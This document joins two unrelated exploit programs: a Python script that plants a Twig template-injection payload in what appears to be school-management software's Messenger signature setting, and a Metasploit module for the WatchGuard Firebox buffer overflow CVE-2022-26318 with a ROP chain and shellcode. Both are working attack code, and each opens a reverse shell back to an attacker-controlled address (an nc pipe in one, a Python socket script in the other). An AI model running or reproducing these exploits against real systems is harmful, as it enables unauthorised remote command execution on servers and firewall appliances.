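#
# Authenticated server-side template injection: the Messenger "signature
# template" setting is rendered with Twig, so a template that pipes a shell
# command through filter('system') runs it on the server when the settings
# page is displayed. The account used must be allowed to edit
# School Admin > Messenger Settings. The template is stored, so every later
# render re-executes it: restore the original signature when done.
import sys
import requests


def _form(fields):
    """Build a requests `files=` mapping that sends `fields` as multipart/form-data.

    The original requests were hand-built multipart bodies; letting requests
    generate the boundary keeps the same encoding without fixed boundaries.
    """
    return {name: (None, value) for name, value in fields.items()}


def _cookie_header(jar):
    """Render a cookie jar as a Cookie header value."""
    return "; ".join(f"{c.name}={c.value}" for c in jar)


def _ssti_payload(attacker_ip, attacker_port):
    """Twig payload: filter('system') runs the array element as a shell command.

    The command is a classic mkfifo reverse shell to attacker_ip:attacker_port.
    """
    cmd = (f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|"
           f"nc {attacker_ip} {attacker_port} >/tmp/f")
    return "{{['" + cmd + "']|filter('system')}}"


def login(target_host, target_port, email, password):
    """Log in and return the Cookie header value for the session, or None.

    Success is recognised by the redirect to /index.php. The cookies are
    taken from the response jar rather than by splitting the raw Set-Cookie
    header at a fixed token position, which broke on any header layout
    other than the author's. gibbonSchoolYearID / gibboni18nID are
    install-specific; adjust them if the login form posts other values.
    """
    url = f'http://{target_host}:{target_port}/login.php?timeout=true'
    fields = {
        "address": "",
        "method": "default",
        "username": email,
        "password": password,
        "gibbonSchoolYearID": "025",
        "gibboni18nID": "0002",
    }
    r = requests.post(url, files=_form(fields), allow_redirects=False)
    if '/index.php' not in r.headers.get('Location', '') or not r.cookies:
        return None
    print("login successful!")
    return _cookie_header(r.cookies)


def rce(cookie, target_host, target_port, attacker_ip, attacker_port):
    """Store the SSTI payload in the Messenger signature template.

    Returns True when the settings handler redirected with return=success0
    (the original's success marker), False otherwise.
    """
    url = f'http://{target_host}:{target_port}/modules/School%20Admin/messengerSettingsProcess.php'
    fields = {
        "address": "/modules/School Admin/messengerSettings.php",
        "enableHomeScreenWidget": "Y",
        "signatureTemplate": _ssti_payload(attacker_ip, attacker_port),
        "messageBcc": "",
        "pinnedMessagesOnHome": "N",
    }
    r = requests.post(url, headers={"Cookie": cookie}, files=_form(fields), allow_redirects=False)
    if 'success0' in r.headers.get('Location', ''):
        print("Payload uploaded successfully!")
        return True
    print("Payload upload failed (no success0 redirect); check that the account can edit Messenger settings.")
    return False


def trigger(cookie, target_host, target_port):
    """Render the settings page so the stored template executes.

    Start the listener first: the request does not return while the shell
    spawned by system() is alive, so a read timeout here is expected once
    the connection has come in.
    """
    url = f'http://{target_host}:{target_port}/index.php?q=/modules/School%20Admin/messengerSettings.php&return=success0'
    try:
        r = requests.get(url, headers={"Cookie": cookie}, allow_redirects=False, timeout=(10, 30))
    except requests.ReadTimeout:
        print("Request timed out while rendering - check the listener for a connection.")
        return
    print(f"Trigger request returned HTTP {r.status_code}; check the listener.")


if __name__ == '__main__':
    if len(sys.argv) != 7:
        print("Usage: script.py <target_host> <target_port> <attacker_ip> <attacker_port> <email> <password>")
        sys.exit(1)
    cookie = login(sys.argv[1], sys.argv[2], sys.argv[5], sys.argv[6])
    if cookie is None:
        print("login failed!")
        sys.exit(1)
    if not rce(cookie, sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4]):
        sys.exit(1)
    trigger(cookie, sys.argv[1], sys.argv[2])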
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'zlib'

# CVE-2022-26318 (WatchGuard Firebox / XTM): the cherrypy admin front end
# forwards the XML-RPC body of the pre-auth /agent/login call to the native
# wgagent binary, which overflows a fixed buffer while parsing it.  The body
# is sent with Content-Encoding: gzip so the oversized XML gets through; the
# overflow lands on a hard-coded ROP chain and self-contained shellcode that
# drops a Python reverse shell into /tmp and executes it.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking
  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck

  # Module metadata.  Besides the usual HttpClient options the only
  # operator-tunable value is 'SHELL' (the interpreter used for the reverse
  # shell); see the note in create_bof_payload before changing it.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'WatchGuard XTM Firebox Unauthenticated Remote Command Execution',
        'Description' => %q{
          This module exploits a buffer overflow at the administration interface (8080 or 4117) of WatchGuard Firebox
          and XTM appliances which is built from a cherrypy python backend sending XML-RPC requests to a C binary
          called wgagent using pre-authentication endpoint /agent/login.
          This vulnerability impacts Fireware OS before 12.7.2_U2, 12.x before 12.1.3_U8, and 12.2.x through 12.5.x
          before 12.5.9_U2. Successful exploitation results in remote code execution as user nobody.
        },
        'Author' => [
          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Metasploit module
          'Charles Fol (Ambionics Security)', # discovery
          'Dylan Pindur (AssetNote)', # reverse engineering of CVE-2022-26318
          'Misterxid' # POC
        ],
        'References' => [
          [ 'CVE', '2022-26318' ],
          [ 'URL', 'https://www.ambionics.io/blog/hacking-watchguard-firewalls' ],
          [ 'URL', 'https://www.assetnote.io/resources/research/diving-deeper-into-watchguard-pre-auth-rce-cve-2022-26318' ],
          [ 'URL', 'https://github.com/misterxid/watchguard_cve-2022-26318' ],
          [ 'URL', 'https://attackerkb.com/topics/t8Nrnu99ZE/cve-2022-26318' ]
        ],
        'License' => MSF_LICENSE,
        'Platform' => [ 'unix' ],
        'Privileged' => false,
        'Arch' => [ ARCH_CMD ],
        'Targets' => [
          [
            'Automatic (Reverse Python Interactive Shell)',
            {
              'Platform' => [ 'unix' ],
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_python',
                # Interpreter for the dropped script; its length is baked into
                # the shellcode data layout (see create_bof_payload).
                'SHELL' => '/usr/bin/python'
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2022-08-29',
        'DefaultOptions' => {
          'SSL' => true,
          'RPORT' => 8080
        },
        'Notes' => {
          # The overflow is expected to take wgagent down; the dropped
          # /tmp/*.py script and the web access log are the on-host traces.
          'Stability' => [ SERVICE_RESOURCE_LOSS ],
          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
          'Reliability' => [ REPEATABLE_SESSION ]
        }
      )
    )
    register_options(
      [
        OptString.new('TARGETURI', [ true, 'WatchGuard Firebox base url', '/' ])
      ]
    )
  end

  # Fingerprint the target by fetching the web login page and looking for the
  # WatchGuard / Firebox banner.  This proves the product only, not the
  # Fireware version, so it cannot tell whether the hard-coded ROP addresses
  # below match the installed wgagent build.
  def check_watchguard_firebox?
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'auth', 'login'),
      'vars_get' => {
        'from_page' => '/'
      }
    })
    return true if res && res.code == 200 && res.body.include?('Powered by WatchGuard Technologies') && res.body.include?('Firebox')

    false
  end

  # Build the gzip-compressed XML-RPC body that overflows wgagent.
  #
  # Layout, in order: a well-formed agent.login prefix, 3181 'A's and 3680
  # '<BBBBMFA>' tags as filler, a zero-padded region, the ROP chain (raw
  # little-endian addresses into the vulnerable wgagent build, e.g. " P@"
  # is 0x405020), then what appears to be position-independent x86-64
  # shellcode (syscall numbers 2/1/3/59/60 suggest open, write, close,
  # execve, exit) followed by its data: argv slots, the SHELL path,
  # @py_fname, an 8-byte write length (0x1ef), and finally the Python source
  # that gets written to @py_fname and executed.
  #
  # Side effect: sets @py_fname to a random /tmp/<4 chars>.py name.
  #
  # NOTE(review): the displacements inside the shellcode (the rip-relative
  # lea/mov operands such as "\x9d", "?", "A") are fixed, so the data that
  # follows must keep its exact size.  datastore['SHELL'] is interpolated
  # immediately before @py_fname; a SHELL value whose length differs from the
  # default '/usr/bin/python' would shift @py_fname relative to those offsets
  # and presumably break the execve argv — confirm against the shellcode
  # before using a custom SHELL.  The write length 0x1ef is likewise fixed
  # regardless of the actual length of the generated Python source.
  def create_bof_payload
    # temporary filename in /tmp where python payload will be stored.
    @py_fname = "/tmp/#{Rex::Text.rand_text_alphanumeric(4)}.py"
    # xml overflow payload
    payload = '<methodCall><methodName>agent.login</methodName><params><param><value><struct><member><value><'.encode
    payload << ('A' * 3181).encode
    payload << 'MFA>'.encode
    payload << ('<BBBBMFA>' * 3680).encode
    # padding and rop chain
    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 P@\x00\x00"
    payload << "\x00\x00\x00h\xf9@\x00\x00\x00\x00\x00 P@\x00\x00\x00\x00\x00\x00\x00\x0e\xd6A\x00\x00\x00\x00\x00\xb1\xd5A"
    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00}^@\x00\x00\x00\x00\x00"
    payload << "\x00\x00\x00\x00\x00\x00\x00\x00|^@\x00\x00\x00\x00\x00\xad\xd2A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    payload << "\x00\x00\x00\x0e\xd6A\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    payload << "\x00\x00\x00\x00\x00\x00\x00\x00*\xa9@\x00\x00\x00\x00\x00H\x8d=\x9d\x00\x00\x00\xbeA\x02\x00\x00\xba\xb6"
    payload << "\x01\x00\x00\xb8\x02\x00\x00\x00\x0f\x05H\x89\x05\x92\x00\x00\x00H\x8b\x15\x93\x00\x00\x00H\x8d5\x94\x00"
    payload << "\x00\x00H\x8b=}\x00\x00\x00\xb8\x01\x00\x00\x00\x0f\x05H\x8b=o\x00\x00\x00\xb8\x03\x00\x00\x00\x0f\x05\xb8;"
    payload << "\x00\x00\x00H\x8d=?\x00\x00\x00H\x89= \x00\x00\x00H\x8d5A\x00\x00\x00H\x895\x1a\x00\x00\x00H\x8d5\x0b\x00"
    payload << "\x00\x001\xd2\x0f\x05\xb8<\x00\x00\x00\x0f\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    # shellcode data: argv slots, interpreter path, script path, write length
    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00#{datastore['SHELL']}\x00#{@py_fname}\x00\x00\x00\x00\x00\x00\x00\x00\x00\xef"
    payload << "\x01\x00\x00\x00\x00\x00\x00"
    # Python source written to @py_fname: open a TCP connection back to
    # LHOST:LPORT, dup it over stdin/stdout/stderr and run SHELL -i on it.
    # The Watchguard appliance has a very restricted linux command set, readonly root filesystem and no unix shells installed
    # The interactive Python shell (-i) is for now the only way to get shell access
    payload << 'import socket;from subprocess import call; from os import dup2;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'.encode
    payload << "s.connect((\"#{datastore['LHOST']}\",#{datastore['LPORT']})); dup2(s.fileno(),0); dup2(s.fileno(),1); dup2(s.fileno(),2);".encode
    payload << "call([\"#{datastore['SHELL']}\",\"-i\"]);".encode
    # The script only removes itself after the interactive shell exits, so
    # the file stays on disk for the lifetime of the session (ARTIFACTS_ON_DISK).
    payload << "import os; os.remove(\"#{@py_fname}\");".encode
    return Zlib.gzip(payload)
  end

  # AutoCheck hook.  Returns Detected (not Appears/Vulnerable) because the
  # banner check cannot establish the Fireware version; a detected Firebox on
  # a patched release will simply not yield a session.
  def check
    print_status("Checking if #{peer} can be exploited.")
    return CheckCode::Detected if check_watchguard_firebox?

    CheckCode::Safe
  end

  # Send the gzip-compressed overflow as a POST to /agent/login.  The HTTP
  # response is ignored on purpose: wgagent is expected to be taken over (or
  # crash) while handling it, so a missing or timed-out reply is normal and
  # success is observed by the handler catching the Python reverse shell.
  def exploit
    print_status("#{peer} - Attempting to exploit...")
    bof_payload = create_bof_payload
    print_status("#{peer} - Sending payload...")
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'agent', 'login'),
      'headers' => {
        'Accept-Encoding' => 'gzip, deflate',
        # The body is gzip-compressed; the front end inflates it before
        # handing the oversized XML to wgagent.
        'Content-Encoding' => 'gzip'
      },
      'data' => bof_payload
    })
  end
end